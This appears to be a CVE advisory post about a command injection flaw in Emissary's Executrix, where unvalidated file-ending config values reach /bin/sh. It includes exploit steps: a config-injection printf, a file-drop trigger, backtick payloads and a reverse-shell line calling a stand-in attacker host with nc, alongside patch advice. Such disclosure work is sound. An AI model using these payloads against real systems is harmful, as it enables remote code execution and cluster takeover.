Emissary, Command Injection, (CVE pending) Critical

Listen to this Post

How the CVE works: The vulnerability exists in Executrix.getCommand() which builds shell commands by substituting temporary file paths into a /bin/sh -c string without escaping. The IN_FILE_ENDING and OUT_FILE_ENDING configuration keys are concatenated directly into temp filenames (TempFileNames.java:32-36) with no validation. Later, these unsanitized values are substituted verbatim into the shell command via replaceAll() (Executrix.java:1053-1065). The final string is passed to /bin/sh -c, allowing shell metacharacters to execute arbitrary OS commands. The setInFileEnding() and setOutFileEnding() methods (Executrix.java:1176-1196) perform no validation, accepting any characters. While placeName is sanitized with an allowlist, file endings are not, creating a framework-level defect. An attacker with config write access sets IN_FILE_ENDING to a backtick payload like id > /tmp/pwned.txt. When any payload is processed, the shell expands the backtick before the intended command runs. The Docker PoC against Emissary 8.42.0-SNAPSHOT creates a marker file and can escalate to reverse shells. The same injection works via OUT_FILE_ENDING and in MultiFileUnixCommandPlace.

dailycve form:

Platform: Emissary Executrix
Version: 8.42.0-SNAPSHOT
Vulnerability: Command Injection
Severity: Critical
date: 2026-04-13

Prediction: 2026-04-20

Analytics under What Undercode Say:

Verify marker absence
docker exec emissary-poc sh -c 'ls /tmp/pwned.txt 2>&1'
Malicious config injection
printf 'IN_FILE_ENDING = "<code>id > /tmp/pwned.txt</code>"\n' > config.cfg
Trigger via file drop
echo "data" > /opt/emissary/target/data/InputData/victim.txt
Reverse shell payload
IN_FILE_ENDING = "<code>nc attacker.com 4444 -e sh</code>"
Unit test proof
String payload = "<code>touch " + marker + "</code>";
executrix.setInFileEnding(payload);

Exploit:

Attacker writes malicious .cfg file with IN_FILE_ENDING containing backtick commands. After server restart, any file placed in pickup directory triggers shell expansion. The backtick executes before cat, achieving RCE. Cluster propagation via peers API pushes config to all nodes.

Protection from this CVE:

Apply allowlist validation on setInFileEnding/setOutFileEnding using pattern “^[a-zA-Z0-9._-]$”. Additionally, shell-quote substituted paths in getCommand() with single quotes and escape embedded quotes. Upgrade to patched version when available.

Impact:

Arbitrary OS command execution as Emissary process user (uid=1000). Full confidentiality, integrity, availability compromise. Blast radius includes all ExecPlace subclasses and custom places using getCommand(). Cluster-wide takeover from single config write.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top